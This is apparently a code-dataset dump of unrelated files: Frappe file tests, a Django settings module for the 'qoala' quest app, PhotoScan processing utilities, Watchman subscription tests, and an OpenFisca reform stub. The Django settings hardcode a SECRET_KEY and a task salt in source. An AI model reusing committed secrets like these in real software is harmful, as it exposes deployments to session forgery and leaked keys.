self.assertEqual(_("Home/Test Folder 1/Test Folder 3"), file.folder)
def test_default_folder(self):
d = frappe.get_doc({
"doctype": "File",
"file_name": _("Test_Folder"),
"is_folder": 1
})
d.save()
self.assertEqual(d.folder, "Home")
def test_on_delete(self):
file = frappe.get_doc("File", {"file_name": "file_copy.txt"})
file.delete()
self.assertEqual(frappe.db.get_value("File", _("Home/Test Folder 1"), "file_size"), 0)
folder = self.get_folder("Test Folder 3", "Home/Test Folder 1")
_file = frappe.get_doc({
"doctype": "File",
"file_name": "folder_copy.txt",
"attached_to_name": "",
"attached_to_doctype": "",
"folder": folder.name,
"content": "Testing folder copy example"})
_file.save()
folder = frappe.get_doc("File", "Home/Test Folder 1/Test Folder 3")
self.assertRaises(frappe.ValidationError, folder.delete)
def test_same_file_url_update(self):
attached_to_doctype1, attached_to_docname1 = make_test_doc()
attached_to_doctype2, attached_to_docname2 = make_test_doc()
file1 = frappe.get_doc({
"doctype": "File",
"file_name": 'file1.txt',
"attached_to_doctype": attached_to_doctype1,
"attached_to_name": attached_to_docname1,
"is_private": 1,
"content": test_content1}).insert()
file2 = frappe.get_doc({
"doctype": "File",
"file_name": 'file2.txt',
"attached_to_doctype": attached_to_doctype2,
"attached_to_name": attached_to_docname2,
"is_private": 1,
"content": test_content1}).insert()
self.assertEqual(file1.is_private, file2.is_private, 1)
self.assertEqual(file1.file_url, file2.file_url)
self.assertTrue(os.path.exists(file1.get_full_path()))
file1.is_private = 0
file1.save()
file2 = frappe.get_doc('File', file2.name)
self.assertEqual(file1.is_private, file2.is_private, 0)
self.assertEqual(file1.file_url, file2.file_url)
self.assertTrue(os.path.exists(file2.get_full_path()))
class TestAttachment(unittest.TestCase):
test_doctype = 'Test For Attachment'
def setUp(self):
if frappe.db.exists('DocType', self.test_doctype):
return
frappe.get_doc(
doctype='DocType',
name=self.test_doctype,
module='Custom',
custom=1,
fields=[
{'label': 'Title', 'fieldname': 'title', 'fieldtype': 'Data'},
{'label': 'Attachment', 'fieldname': 'attachment', 'fieldtype': 'Attach'},
]
).insert()
def tearDown(self):
frappe.delete_doc('DocType', self.test_doctype)
def test_file_attachment_on_update(self):
doc = frappe.get_doc(
doctype=self.test_doctype,
title='test for attachment on update'
).insert()
file = frappe.get_doc({
'doctype': 'File',
'file_name': 'test_attach.txt',
'content': 'Test Content'
})
file.save()
doc.attachment = file.file_url
doc.save()
exists = frappe.db.exists('File', {
'file_name': 'test_attach.txt',
'file_url': file.file_url,
'attached_to_doctype': self.test_doctype,
'attached_to_name': doc.name,
'attached_to_field': 'attachment'
})
self.assertTrue(exists)
| mit | -7,613,170,055,564,613,000 | 26.989362 | 88 | 0.666952 | false |
HackerDom/qoala | qoala/settings/common.py | 1 | 4599 | # -*- coding: utf-8 -*-
"""
Django settings for qoala project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import sys
from django.conf import global_settings
# https://stackoverflow.com/a/21693784/6832066
TEMPLATE_CONTEXT_PROCESSORS = global_settings.TEMPLATE_CONTEXT_PROCESSORS + [
"django.core.context_processors.request",
]
PROJECT_DIR = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
BASE_DIR = os.path.dirname(PROJECT_DIR)
DATA_SUFFIX = os.environ.get('DATA_SUFFIX', '')
DATA_DIR = os.path.join(BASE_DIR, 'data' + DATA_SUFFIX)
TASKS_DIR = os.path.join(DATA_DIR, 'tasks')
TASKS_DATA_DIR = os.path.join(DATA_DIR, 'tmptasks')
INSTANCE_NAME = 'Qoala'
# App/Library Paths
sys.path.append(os.path.join(BASE_DIR, 'apps'))
sys.path.append(os.path.join(BASE_DIR, 'lib'))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '3tqlw0=fqml%ivszvim&8)$(%&#_69cmulxm-4ai-fib9=+#%*'
# Salt for generating tasks patterns
TASK_SALT = "asdkajdlkasjdlkajsdlkajlskdjalksdjkl"
ANSWERS_PER_MINUTE = 30
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
TEMPLATE_DEBUG = False
# Is this a development instance? Set this to True on development/master
# instances and False on stage/prod.
DEV = False
ALLOWED_HOSTS = []
AUTH_USER_MODEL = "teams.Team"
AUTHENTICATION_BACKENDS = ('django.contrib.auth.backends.ModelBackend', 'teams.auth.TokenAuthBackend')
LOGIN_REDIRECT_URL = '/'
LOGIN_URL = '/teams/login'
LOGOUT_URL = '/teams/logout'
SHOW_ZEROS_ON_SCOREBOARD = True
# Application definition
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.admin',
'django.contrib.humanize',
'django.contrib.staticfiles',
# Third-party apps, patches, fixes
'djcelery',
# Database migrations
# 'south',
# Global context
'base',
# Own apps
'teams',
'quests',
'board'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'qoala.urls'
WSGI_APPLICATION = 'qoala.wsgi.application'
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
#LANGUAGE_CODE = 'en-us'
LANGUAGE_CODE = 'ru'
LANGUAGES = (
('ru', 'Russian'),
('en', 'English'),
)
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
TIME_ZONE = 'Asia/Yekaterinburg'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.example.com/static/"
STATIC_ROOT = os.path.join(PROJECT_DIR, 'static')
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "base/static"),
)
# Sessions
#
# By default, be at least somewhat secure with our session cookies.
SESSION_COOKIE_HTTPONLY = True
def custom_show_toolbar(request):
""" Only show the debug toolbar to users with the superuser flag. """
return request.user.is_superuser
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False,
'SHOW_TOOLBAR_CALLBACK': 'qoala.settings.custom_show_toolbar',
'SHOW_TEMPLATE_CONTEXT': True,
'ENABLE_STACKTRACES': True,
}
DEBUG_TOOLBAR_PATCH_SETTINGS = False
# Uncomment these to activate and customize Celery:
# CELERY_ALWAYS_EAGER = False # required to activate celeryd
#BROKER_URL = 'amqp://guest:guest@localhost//'
| gpl-3.0 | -744,898,877,219,937,500 | 25.130682 | 102 | 0.724288 | false |
rmsare/sfmtools | sfmtools.py | 1 | 2864 | """ Utility functions for PhotoScan processing """
import os, sys
import PhotoScan
def align_and_clean_photos(chunk):
ncameras = len(chunk.cameras)
for frame in chunk.frames:
frame.matchPhotos()
chunk.alignCameras()
for camera in chunk.cameras:
if camera.transform is None:
chunk.remove(camera)
naligned = len(chunk.cameras)
print('%d/%d cameras aligned' % (naligned, ncameras))
def batch_process(projectname, threshold, resolution):
doc = PhotoScan.app.document
if projectname[-4:] is not '.psz':
projectname = ''.join([projectname, '.psz'])
if os.path.isfile(projectname):
doc.open(projectname)
folders = ['dems', 'reports', 'orthos']
for folder in folders:
if not os.path.isdir(folder):
os.mkdir(folder)
for chunk in doc.chunks:
filter_photos_by_quality(chunk, threshold)
align_and_clean_photos(chunk)
chunk.buildDenseCloud(quality=PhotoScan.HighQuality)
doc.alignChunks(doc.chunks, doc.chunks[0])
doc.mergeChunks(doc.chunks, merge_dense_clouds=True, merge_markers=True)
chunk = doc.chunks[len(doc.chunks)-1]
chunk.buildModel(surface=PhotoScan.HeightField, face_count=PhotoScan.HighFaceCount)
chunk.exportDem('dems/test_0.5m.tif', format='tif', dx=0.5, dy=0.5)
#export_dems('dems/', 'tif', resolution)
#export_orthos('orthos/', resolution)
for chunk in doc.chunks:
filename = ''.join(['reports/', ''.join(chunk.label.split(' ')), '.pdf'])
chunk.exportReport(filename)
doc.save(projectname)
def export_dems(pathname, formatstring, resolution):
if not os.path.isdir(pathname):
os.mkdir(pathname)
if pathname[-1:] is not '/':
pathname = ''.join([pathname, '/'])
nchunks = len(PhotoScan.app.document.chunks)
nexported = nchunks
for chunk in PhotoScan.app.document.chunks:
filename = ''.join([pathname, ''.join(chunk.label.split(' ')), '.', formatstring])
exported = chunk.exportDem(filename, format=formatstring)
if not exported:
print('Export failed:', chunk.label)
nexported -= 1
print('%d/%d DEMs exported' % (nexported, nchunks))
def filter_photos_by_quality(chunk, threshold):
for camera in chunk.cameras:
if camera.frames[0].photo.meta['Image/Quality'] is None:
chunk.estimateImageQuality([camera])
if float(camera.frames[0].photo.meta['Image/Quality']) < threshold:
chunk.remove(camera)
def load_masks_for_chunk(chunk, mask_dir):
for camera in chunk.cameras:
label = camera.label
mask_fname = mask_dir + label + '_mask.png'
if os.path.isfile(mask_fname):
this_mask = PhotoScan.Mask.load(mask_fname)
camera.mask = this_mask
| mit | -1,115,124,108,005,124,100 | 33.506024 | 90 | 0.633729 | false |
facebook/watchman | watchman/tests/integration/test_subscribe.py | 1 | 27103 | # vim:ts=4:sw=4:et:
# Copyright 2015-present Facebook, Inc.
# Licensed under the Apache License, Version 2.0
# no unicode literals
from __future__ import absolute_import, division, print_function
import json
import os
import os.path
import pywatchman
import WatchmanTestCase
from path_utils import norm_relative_path
try:
import unittest2 as unittest
except ImportError:
import unittest
@WatchmanTestCase.expand_matrix
class TestSubscribe(WatchmanTestCase.WatchmanTestCase):
def requiresPersistentSession(self):
return True
def wlockExists(self, subdata, exists):
norm_wlock = norm_relative_path(".hg/wlock")
for sub in subdata:
if "files" not in sub:
# Don't trip over cancellation notices left over from other
# tests that ran against this same instance
continue
for f in sub["files"]:
if (
f["exists"] == exists
and norm_relative_path(f["name"]) == norm_wlock
):
return True
return False
def matchStateSubscription(self, subdata, mode):
for sub in subdata:
if mode in sub:
return sub
return None
def assertWaitForAssertedStates(self, root, states):
def sortStates(states):
"""Deterministically sort the states for comparison.
We sort by name and rely on the sort being stable as the
relative ordering of the potentially multiple queueued
entries per name is important to preserve"""
return sorted(states, key=lambda x: x["name"])
states = sortStates(states)
def getStates():
res = self.watchmanCommand("debug-get-asserted-states", root)
return sortStates(res["states"])
self.assertWaitForEqual(states, getStates)
def test_state_enter_leave(self):
root = self.mkdtemp()
self.watchmanCommand("watch", root)
result = self.watchmanCommand("debug-get-asserted-states", root)
self.assertEqual([], result["states"])
self.watchmanCommand("state-enter", root, "foo")
self.watchmanCommand("state-enter", root, "bar")
self.assertWaitForAssertedStates(
root,
[
{"name": "bar", "state": "Asserted"},
{"name": "foo", "state": "Asserted"},
],
)
self.assertListEqual(
[u"bar", u"foo"],
sorted(
self.watchmanCommand(
"subscribe",
root,
"defer",
{"fields": ["name"], "defer": ["foo", "bar"]},
).get("asserted-states")
),
)
self.watchmanCommand("state-leave", root, "foo")
self.assertWaitForAssertedStates(root, [{"name": "bar", "state": "Asserted"}])
self.watchmanCommand("state-leave", root, "bar")
self.assertWaitForAssertedStates(root, [])
def test_defer_state(self):
root = self.mkdtemp()
self.watchmanCommand("watch", root)
self.watchmanCommand(
"subscribe", root, "defer", {"fields": ["name"], "defer": ["foo"]}
)
self.touchRelative(root, "a")
self.assertNotEqual(None, self.waitForSub("defer", root=root))
def isStateEnterFoo(sub):
for item in sub:
if item.get("state-enter", None) == "foo":
return True
return False
self.watchmanCommand("state-enter", root, "foo")
sub = self.waitForSub("defer", root, accept=isStateEnterFoo)
self.assertTrue(isStateEnterFoo(sub))
self.touchRelative(root, "in-foo")
# We expect this to timeout because state=foo is asserted
with self.assertRaises(pywatchman.SocketTimeout):
self.waitForSub("defer", root, timeout=1)
self.watchmanCommand("state-leave", root, "foo")
self.assertNotEqual(
None,
self.waitForSub(
"defer",
root,
accept=lambda x: self.matchStateSubscription(x, "state-leave"),
),
)
# and now we should observe the file change
self.assertNotEqual(None, self.waitForSub("defer", root))
# and again, but this time passing metadata
self.watchmanCommand("state-enter", root, {"name": "foo", "metadata": "meta!"})
begin = self.waitForSub("defer", root)[0]
self.assertEqual("foo", begin["state-enter"])
self.assertEqual("meta!", begin["metadata"])
self.touchRelative(root, "in-foo-2")
# flush-subscriptions should let this come through immediately
flush = self.watchmanCommand(
"flush-subscriptions", root, {"sync_timeout": 1000}
)
del flush["version"]
self.assertDictEqual(
{"synced": ["defer"], "no_sync_needed": [], "dropped": []}, flush
)
sub_data = self.getSubscription("defer", root)
self.assertEqual(1, len(sub_data))
self.assertFileListsEqual(["in-foo-2"], sub_data[0]["files"])
self.touchRelative(root, "in-foo-3")
# We expect this to timeout because state=foo is asserted
with self.assertRaises(pywatchman.SocketTimeout):
self.waitForSub("defer", root, timeout=1)
self.watchmanCommand(
"state-leave", root, {"name": "foo", "metadata": "leavemeta"}
)
end = self.waitForSub(
"defer",
root,
accept=lambda x: self.matchStateSubscription(x, "state-leave"),
)[0]
self.assertEqual("leavemeta", end["metadata"])
# and now we should observe the file change
self.assertNotEqual(None, self.waitForSub("defer", root))
def test_drop_state(self):
root = self.mkdtemp()
self.watchmanCommand("watch", root)
self.watchmanCommand(
"subscribe", root, "drop", {"fields": ["name"], "drop": ["foo"]}
)
self.assertNotEqual(None, self.waitForSub("drop", root=root))
self.touchRelative(root, "a")
self.assertNotEqual(None, self.waitForSub("drop", root=root))
self.watchmanCommand("state-enter", root, "foo")
begin = self.waitForSub("drop", root)[0]
self.assertEqual("foo", begin["state-enter"])
self.touchRelative(root, "in-foo")
flush = self.watchmanCommand(
"flush-subscriptions", root, {"sync_timeout": 1000}
)
del flush["version"]
self.assertDictEqual(
{"synced": [], "no_sync_needed": [], "dropped": ["drop"]}, flush
)
self.touchRelative(root, "in-foo-2")
# We expect this to timeout because state=foo is asserted
with self.assertRaises(pywatchman.SocketTimeout):
self.waitForSub("drop", root, timeout=1)
self.watchmanCommand("state-leave", root, "foo")
self.assertNotEqual(
None,
self.waitForSub(
"drop",
root,
accept=lambda x: self.matchStateSubscription(x, "state-leave"),
),
)
# There should be no more subscription data to observe
# because we requested that it be dropped
with self.assertRaises(pywatchman.SocketTimeout):
self.waitForSub("drop", root, timeout=1)
# let's make sure that we can observe new changes
self.touchRelative(root, "out-foo")
self.assertFileList(root, files=["a", "in-foo", "in-foo-2", "out-foo"])
self.assertNotEqual(None, self.waitForSub("drop", root))
def test_defer_vcs(self):
root = self.mkdtemp()
# fake an hg control dir
os.mkdir(os.path.join(root, ".hg"))
# touch another file so that the initial subscription result comes
# through
self.touchRelative(root, "foo")
self.watchmanCommand("watch", root)
self.assertFileList(root, files=[".hg", "foo"])
self.watchmanCommand(
"subscribe",
root,
"defer",
{
"expression": ["type", "f"],
"fields": ["name", "exists"],
"defer_vcs": True,
},
)
dat = self.waitForSub("defer", root)[0]
self.assertEqual(True, dat["is_fresh_instance"])
self.assertEqual([{"name": "foo", "exists": True}], dat["files"])
# Pretend that hg is update the working copy
self.touchRelative(root, ".hg", "wlock")
# flush-subscriptions should force the update through
flush = self.watchmanCommand(
"flush-subscriptions", root, {"sync_timeout": 1000}
)
del flush["version"]
self.assertDictEqual(
{"synced": ["defer"], "no_sync_needed": [], "dropped": []}, flush
)
sub_data = self.getSubscription("defer", root)
self.assertEqual(1, len(sub_data))
self.assertFileListsEqual(
[".hg/wlock"], [d["name"] for d in sub_data[0]["files"]]
)
self.touchRelative(root, "in-foo")
# We expect this to timeout because the wlock file exists
with self.assertRaises(pywatchman.SocketTimeout):
self.waitForSub(
"defer", root, accept=lambda x: self.wlockExists(x, True), timeout=2
)
# Remove the wlock and allow subscriptions to flow
os.unlink(os.path.join(root, ".hg", "wlock"))
dat = self.waitForSub(
"defer", root, timeout=2, accept=lambda x: self.wlockExists(x, False)
)
self.assertNotEqual(None, dat)
def test_immediate_subscribe(self):
root = self.mkdtemp()
# fake an hg control dir
os.mkdir(os.path.join(root, ".hg"))
self.watchmanCommand("watch", root)
self.assertFileList(root, files=[".hg"])
self.watchmanCommand(
"subscribe",
root,
"nodefer",
{"fields": ["name", "exists"], "defer_vcs": False},
)
dat = self.waitForSub("nodefer", root)[0]
self.assertEqual(True, dat["is_fresh_instance"])
self.assertEqual([{"name": ".hg", "exists": True}], dat["files"])
# Pretend that hg is update the working copy
self.touchRelative(root, ".hg", "wlock")
dat = self.waitForSub(
"nodefer", root, accept=lambda x: self.wlockExists(x, True)
)
# We observed the changes even though wlock existed
self.assertNotEqual(None, dat)
os.unlink(os.path.join(root, ".hg", "wlock"))
dat = self.waitForSub(
"nodefer", root, accept=lambda x: self.wlockExists(x, False)
)
self.assertNotEqual(None, dat)
def test_multi_cancel(self):
"""Test that for multiple subscriptions on the same socket, we receive
cancellation notices for all of them."""
root = self.mkdtemp()
self.touchRelative(root, "lemon")
self.watchmanCommand("watch", root)
self.assertFileList(root, files=["lemon"])
for n in range(32):
sub_name = "sub%d" % n
self.watchmanCommand("subscribe", root, sub_name, {"fields": ["name"]})
# Drain the initial messages
dat = self.waitForSub(sub_name, root, remove=True)
self.assertEqual(len(dat), 1)
dat = dat[0]
self.assertFileListsEqual(dat["files"], ["lemon"])
self.watchmanCommand("watch-del", root)
for n in range(32):
# If the cancellation notice doesn't come through this will timeout.
dat = self.waitForSub("sub%d" % n, root)
self.assertEqual(len(dat), 1)
dat = dat[0]
self.assertTrue(dat["canceled"])
self.assertTrue(dat["unilateral"])
def test_subscribe(self):
root = self.mkdtemp()
a_dir = os.path.join(root, "a")
os.mkdir(a_dir)
self.touchRelative(a_dir, "lemon")
self.touchRelative(root, "b")
self.watchmanCommand("watch", root)
self.assertFileList(root, files=["a", "a/lemon", "b"])
self.watchmanCommand("subscribe", root, "myname", {"fields": ["name"]})
self.watchmanCommand(
"subscribe", root, "relative", {"fields": ["name"], "relative_root": "a"}
)
# prove initial results come through
dat = self.waitForSub("myname", root=root)[0]
self.assertEqual(True, dat["is_fresh_instance"])
self.assertFileListsEqual(dat["files"], ["a", "a/lemon", "b"])
# and that relative_root adapts the path name
dat = self.waitForSub("relative", root=root)[0]
self.assertEqual(True, dat["is_fresh_instance"])
self.assertFileListsEqual(dat["files"], ["lemon"])
# check that deletes show up in the subscription results
os.unlink(os.path.join(root, "a", "lemon"))
dat = self.waitForSub(
"myname",
root=root,
accept=lambda x: self.findSubscriptionContainingFile(x, "a/lemon"),
)
self.assertNotEqual(None, dat)
self.assertEqual(False, dat[0]["is_fresh_instance"])
dat = self.waitForSub(
"relative",
root=root,
accept=lambda x: self.findSubscriptionContainingFile(x, "lemon"),
)
self.assertNotEqual(None, dat)
self.assertEqual(False, dat[0]["is_fresh_instance"])
# Trigger a recrawl and ensure that the subscription isn't lost
self.watchmanCommand("debug-recrawl", root)
def matchesRecrawledDir(subdata):
for sub in subdata:
if "warning" in sub:
return True
return False
# ensure that there is at least one change to broadcast
self.touchRelative(root, "a")
dat = self.waitForSub("myname", root=root, accept=matchesRecrawledDir)
self.assertNotEqual(None, dat)
# Ensure that we observed the recrawl warning
warn = None
for item in dat:
if "warning" in item:
warn = item["warning"]
break
self.assertRegex(warn, r"Recrawled this watch")
# TODO: this test is very flaky on Windows
@unittest.skipIf(os.name == "nt", "win")
def test_flush_subscriptions(self):
root = self.mkdtemp()
with open(os.path.join(root, ".watchmanconfig"), "w") as f:
f.write(json.dumps({"win32_batch_latency_ms": 0}))
a_dir = os.path.join(root, "a")
os.mkdir(a_dir)
self.touchRelative(a_dir, "lemon.txt")
self.touchRelative(a_dir, "orange.dat")
self.touchRelative(root, "b")
self.watchmanCommand("watch", root)
self.assertFileList(
root, files=[".watchmanconfig", "a", "a/lemon.txt", "a/orange.dat", "b"]
)
self.watchmanCommand(
"subscribe", root, "sub1", {"fields": ["name"], "expression": ["type", "f"]}
)
self.watchmanCommand(
"subscribe",
root,
"sub2",
{
"fields": ["name"],
"expression": ["allof", ["type", "f"], ["suffix", "txt"]],
},
)
self.watchmanCommand(
"subscribe",
root,
"sub3",
{
"fields": ["name"],
"expression": ["allof", ["type", "f"], ["suffix", "dat"]],
},
)
root2 = self.mkdtemp()
self.touchRelative(root2, "banana")
self.watchmanCommand("watch", root2)
self.assertFileList(root2, files=["banana"])
ret = self.watchmanCommand(
"subscribe", root2, "sub-other", {"fields": ["name"]}
)
# discard the initial result PDUs
self.waitForSub("sub1", root=root)
self.waitForSub("sub2", root=root)
self.waitForSub("sub3", root=root)
# pause subscriptions so that the result of flush-subscriptions is
# deterministic
debug_ret = self.watchmanCommand(
"debug-set-subscriptions-paused", {"sub1": True, "sub2": True, "sub3": True}
)
self.assertDictEqual(
{
"sub1": {"old": False, "new": True},
"sub2": {"old": False, "new": True},
"sub3": {"old": False, "new": True},
},
debug_ret["paused"],
)
self.touchRelative(root, "c")
self.touchRelative(a_dir, "d.txt")
self.touchRelative(a_dir, "e.dat")
# test out a few broken flush-subscriptions
broken_args = [
((), "wrong number of arguments to 'flush-subscriptions'"),
((root,), "wrong number of arguments to 'flush-subscriptions'"),
(
(root, {"subscriptions": ["sub1"]}),
"key 'sync_timeout' is not present in this json object",
),
(
(root, {"subscriptions": "wat", "sync_timeout": 2000}),
"expected 'subscriptions' to be an array of subscription names",
),
(
(root, {"subscriptions": ["sub1", False], "sync_timeout": 2000}),
"expected 'subscriptions' to be an array of subscription names",
),
(
(root, {"subscriptions": ["sub1", "notsub"], "sync_timeout": 2000}),
"this client does not have a subscription named 'notsub'",
),
(
(root, {"subscriptions": ["sub1", "sub-other"], "sync_timeout": 2000}),
"subscription 'sub-other' is on root",
),
]
for args, err_msg in broken_args:
with self.assertRaises(pywatchman.WatchmanError) as ctx:
self.watchmanCommand("flush-subscriptions", *args)
self.assertIn(err_msg, str(ctx.exception))
ret = self.watchmanCommand(
"flush-subscriptions",
root,
{"sync_timeout": 1000, "subscriptions": ["sub1", "sub2"]},
)
version = ret["version"]
self.assertEqual([], ret["no_sync_needed"])
self.assertCountEqual(["sub1", "sub2"], ret["synced"])
# Do not wait for subscription results -- instead, make sure they've
# shown up immediately.
sub1_data = self.getSubscription("sub1", root)
sub2_data = self.getSubscription("sub2", root)
for sub_name, sub_data in [("sub1", sub1_data), ("sub2", sub2_data)]:
self.assertEqual(1, len(sub_data))
data = sub_data[0].copy()
# we'll verify these below
del data["files"]
del data["since"]
# this is subject to change so we can't verify it
del data["clock"]
self.assertDictEqual(
{
"version": version,
"is_fresh_instance": False,
"subscription": sub_name,
"root": root,
"unilateral": True,
},
data,
)
self.assertFileListsEqual(["a/d.txt", "a/e.dat", "c"], sub1_data[0]["files"])
self.assertFileListsEqual(["a/d.txt"], sub2_data[0]["files"])
# touch another file, make sure the updates come through again
self.touchRelative(a_dir, "f.dat")
ret = self.watchmanCommand(
"flush-subscriptions",
root,
# default for subscriptions is to sync all subscriptions matching
# root (so sub1, sub2 and sub3, but not sub-other)
{"sync_timeout": 1000},
)
self.assertCountEqual(["sub2"], ret["no_sync_needed"])
self.assertCountEqual(["sub1", "sub3"], ret["synced"])
# again, don't wait for the subscriptions
sub1_data2 = self.getSubscription("sub1", root)
sub2_data2 = self.getSubscription("sub2", root)
sub3_data2 = self.getSubscription("sub3", root)
self.assertEqual(1, len(sub1_data2))
# no updates to sub2, so we expect nothing
self.assertIs(None, sub2_data2)
self.assertEqual(1, len(sub3_data2))
self.assertEqual(
sub1_data[0]["clock"],
sub1_data2[0]["since"],
'for sub1, previous "clock" should be current "since"',
)
self.assertFileListsEqual(["a/f.dat"], sub1_data2[0]["files"])
self.assertFileListsEqual(["a/e.dat", "a/f.dat"], sub3_data2[0]["files"])
# now resume the subscriptions and make sure future updates (and only
# future updates) come through
self.watchmanCommand(
"debug-set-subscriptions-paused",
{"sub1": False, "sub2": False, "sub3": False},
)
self.touchRelative(root, "newfile.txt")
new_sub1 = self.waitForSub("sub1", root=root)[0]
new_sub2 = self.waitForSub("sub2", root=root)[0]
self.assertEqual(sub1_data2[0]["clock"], new_sub1["since"])
# for sub2 the clock is different because we've actually forced an
# evaluation in between in the second flush-subscriptions call, so we
# don't have a reference point
self.assertFileListsEqual(["newfile.txt"], new_sub1["files"])
self.assertFileListsEqual(["newfile.txt"], new_sub2["files"])
def test_unsub_deadlock(self):
"""I saw a stack trace of a lock assertion that seemed to originate
in the unsubByName() method. It looks possible for this to call
itself recursively and this test exercises that code path. It
also exercises a similar deadlock where multiple subscriptions from
multiple connections are torn down around the same time."""
root = self.mkdtemp()
self.watchmanCommand("watch", root)
clock = self.watchmanCommand("clock", root)["clock"]
for _ in range(0, 100):
clients = []
for i in range(0, 20):
client = self.getClient(no_cache=True)
client.query(
"subscribe", root, "sub%s" % i, {"fields": ["name"], "since": clock}
)
self.touchRelative(root, "a")
clients.append(client)
for client in clients:
client.close()
def test_subscription_cleanup(self):
"""Verify that subscriptions get cleaned up from internal state on
unsubscribes and socket disconnects. This test failing usually
indicates a reference cycle keeping the subscriber alive."""
root = self.mkdtemp()
a_dir = os.path.join(root, "a")
os.mkdir(a_dir)
self.touchRelative(a_dir, "lemon.txt")
self.touchRelative(a_dir, "orange.dat")
self.touchRelative(root, "b")
self.watchmanCommand("watch", root)
self.assertFileList(root, files=["a", "a/lemon.txt", "a/orange.dat", "b"])
self.watchmanCommand(
"subscribe", root, "sub1", {"fields": ["name"], "expression": ["type", "f"]}
)
self.touchRelative(a_dir, "wat.txt")
self.watchmanCommand(
"subscribe", root, "sub2", {"fields": ["name"], "expression": ["type", "f"]}
)
out = self.watchmanCommand("debug-get-subscriptions", root)
subs = {sub["info"]["name"] for sub in out["subscribers"]}
self.assertCountEqual({"sub1", "sub2"}, subs)
# this should remove sub1 from the map
self.watchmanCommand("unsubscribe", root, "sub1")
out = self.watchmanCommand("debug-get-subscriptions", root)
subs = {sub["info"]["name"] for sub in out["subscribers"]}
self.assertCountEqual({"sub2"}, subs)
# flush sub2 so that there's no reason anything else would be keeping
# it around
self.watchmanCommand("flush-subscriptions", root, {"sync_timeout": 1000})
# disconnect from the socket -- the next command will reconnect the
# socket, but sub2 should have disappeared
self.client.close()
# It might take a while for watchman to realize its connection has been
# reset, so check repeatedly.
def checkSubscribers():
out = self.watchmanCommand("debug-get-subscriptions", root)
return out["subscribers"]
self.assertWaitForEqual([], checkSubscribers)
# TODO: Assimilate this test into test_subscribe when Watchman gets
# unicode support.
# TODO: Correctly test subscribe with unicode on Windows.
@unittest.skipIf(os.name == "nt", "win")
@WatchmanTestCase.skip_for(codecs=["json"])
def test_subscribe_unicode(self):
unicode_filename = u"\u263a"
# On Python 2, pywatchman returns bytestrings by default. On Python 3
# it returns Unicode strings. So we need to take care of that.
if not pywatchman.compat.PYTHON3:
unicode_filename = unicode_filename.encode("utf-8")
root = self.mkdtemp()
a_dir = os.path.join(root, "a")
os.mkdir(a_dir)
self.touchRelative(a_dir, "lemon")
self.touchRelative(root, "b")
self.touchRelative(root, unicode_filename)
self.watchmanCommand("watch", root)
self.assertFileList(root, files=["a", "a/lemon", "b", unicode_filename])
self.watchmanCommand("subscribe", root, "myname", {"fields": ["name"]})
self.watchmanCommand(
"subscribe", root, "relative", {"fields": ["name"], "relative_root": "a"}
)
# prove initial results come through
dat = self.waitForSub("myname", root=root)[0]
self.assertEqual(True, dat["is_fresh_instance"])
self.assertFileListsEqual(dat["files"], ["a", "a/lemon", "b", unicode_filename])
os.unlink(os.path.join(root, "a", "lemon"))
# Trigger a recrawl and ensure that the subscription isn't lost
self.watchmanCommand("debug-recrawl", root)
def matchesRecrawledDir(subdata):
for sub in subdata:
if "warning" in sub:
return True
return False
# ensure that there is at least one change to broadcast
self.touchRelative(root, "a")
dat = self.waitForSub("myname", root=root, accept=matchesRecrawledDir)
self.assertNotEqual(None, dat)
# Ensure that we observed the recrawl warning
warn = None
for item in dat:
if "warning" in item:
warn = item["warning"]
break
self.assertRegex(warn, r"Recrawled this watch")
def findSubscriptionContainingFile(self, subdata, filename):
filename = norm_relative_path(filename)
for dat in subdata:
if "files" in dat and filename in self.normFileList(dat["files"]):
return dat
return None
def normFileList(self, files):
return sorted(map(norm_relative_path, files))
| apache-2.0 | -898,115,865,545,391,100 | 35.774763 | 88 | 0.564698 | false |
MalkIPP/ipp_work | ipp_work/reforms/ir_marg_rate.py | 1 | 2157 | # -*- coding: utf-8 -*-
# OpenFisca -- A versatile microsimulation software
# By: OpenFisca Team <[email protected]>
#
# Copyright (C) 2011, 2012, 2013, 2014, 2015 OpenFisca Team
# https://github.com/openfisca
#
# This file is part of OpenFisca.
#
# OpenFisca is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# OpenFisca is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division
import logging
from openfisca_core import formulas, reforms
from openfisca_france.model.prelevements_obligatoires.impot_revenu import ir
log = logging.getLogger(__name__)
class rni(formulas.SimpleFormulaColumn):
reference = ir.rni
